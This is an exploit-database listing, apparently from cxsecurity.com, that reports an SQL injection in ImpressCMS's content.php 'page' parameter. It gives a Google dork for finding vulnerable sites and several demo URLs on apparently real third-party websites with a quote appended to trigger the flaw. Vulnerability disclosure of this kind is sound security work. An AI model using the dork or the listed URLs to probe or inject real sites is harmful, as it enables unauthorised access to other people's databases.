Impress CMS SQL Injection

2013.01.19
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: \"Powered by ImpressCMS\" inurl:content.php?page=

############## # Exploit Title : Impress CMS SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # software Homepage: www.impresscms.org # # Home : ww.Ashiyane.org # # Security Risk : High - SQL Injection # # Dork : "Powered by ImpressCMS" inurl:content.php?page= # ############## #location: site/modules/content/content.php?page=[SQL] # or site/content.php?page=[SQL] # # #DEMO: # # www.impressXXcms.org/content.php?page=Download%27 # # www.vfk-vzXw.be/modules/content/content.php?page=links%27 # # www.pmp-Xwebdesign.de/modules/content/content.php?page=rechtliches%27 # # www.nabXasti.com/atradu/modules/content/content.php?page=sub-1-a-1%27 # # www.huXbstar.net/info/modules/content/content.php?page=test2%27 # # ngevacorp.freehosXtia.com/index.php?automodule=gallery&cmd=si&img=726%27 # # ############## #Greetz to: My Lord ALLAH ############## # #Amirh03in # ##############

References:

http://www.impresscms.org/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top